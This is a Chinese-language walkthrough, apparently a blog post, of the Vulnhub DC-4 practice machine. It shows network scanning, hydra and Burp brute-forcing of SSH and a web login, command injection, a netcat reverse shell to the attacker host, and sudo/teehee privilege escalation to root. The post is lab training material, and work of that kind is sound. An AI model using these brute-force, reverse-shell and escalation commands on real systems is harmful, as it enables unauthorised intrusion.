Vulnhub 之 DC-4
本文只用于学习知识,不要将其用于非法途径,
前言
DC已经做了一半了,前三次都是基于初学者的,这次的难度就提升了,适合初学者和入门的伙伴。
还是按照常例看看作者是怎么描述的吧。
下载地址
描述
DC-4是另一个专门建造的脆弱实验室,目的是获得渗透测试领域的经验。
与以前的DC版本不同,这个版本主要是为初学者/中间用户设计的。只有一面旗帜,但技术上来说,有多个入口,就像上次一样,没有线索。
必须具备Linux技能和熟悉Linux命令行,就像一些基本渗透测试工具的经验一样。
对于初学者来说,谷歌可能会有很大的帮助,但是你可以随时在@DCAU7发推给我寻求帮助,让你重新开始。但是请注意:我不会给你答案,相反,我会给你一个如何前进的想法。</pre>
所以说,谷歌真的很万能。O(∩*∩)O哈哈~*
靶机环境
记得修改DC-4的网络为NAT模式
kali : 192.168.248.130
DC-4 : 192.168.248.128
靶机复现
-
扫描网段
nmap -sn 192.168.248.0/24
发现目标ip : 192.168.248.128
-
扫描端口
nmap -sS 192.168.248.128
-
尝试爆破ssh
hydra -l root -P /root/Desktop/weakpass.txt -t 5 ssh://192.168.248.128
一般破解需要时间所以我就做一个演示
-
网站搜寻线索
发现是一个登录框,
并且没有登录限制,尝试爆破
可以使用hydra爆破,这里我使用burp做测试
设置为
Cluster bomb
,用户给admin和root ,密码采用弱口令字典这个网上挺多的,或者使用hydra的默认字典也可以,然后线程跑高点 , 我这里给burp设置的20,大概不到一分钟就出来了。
这里只要登录成功后之后的登录都是636了
-
登录发现
有三个命令可以运行,然后抓包查看发现可以在radio这块执行了系统命令,那么是否可以执行其他的命令
尝试执行
whoami
既然可以执行一些简单的命令,我们就可以尝试去反弹shell
命令:
nc -e /bin/sh 192.168.248.130 4444
获取交互模式
命令:
python -c 'import pty;pty.spawn("/bin/bash")'
之后在home的jim目录下发现了一个旧密码的备份
或许可以尝试用它去爆破ssh
命令:
chydra -L /root/Desktop/user.txt -P /root/Desktop/dc_pass.txt -t 5 ssh://192.168.248.128
等待是漫长的,要有耐心
终于出来了一个 用户名:
jim
密码:jibril04
切换到jim用户下,打开mbox查看
有邮件,去mail下查看,发现了jim文件获取到jim的密码
-
登录charles
密码:
^xHhA&hvim0y
命令:
sudo -l
查看权限 发现可以不需要密码执行teehee百度得到提权方式
1 通过teehee的sudo提升权限以 root身份写入crontab计划任务通过执行获取root权限
2 还有个2呢,多个想法多个活路
通过添加用户到passwd,设置其权限,之后su 访问即可获得root
所以,最好不要给用户sudo权限,或者限制sudo权限的,这样才能保证网络安全
结束语
今天的靶机奉上各位看官,过程简单,主要掌握提权的思路和前期爆破的等待。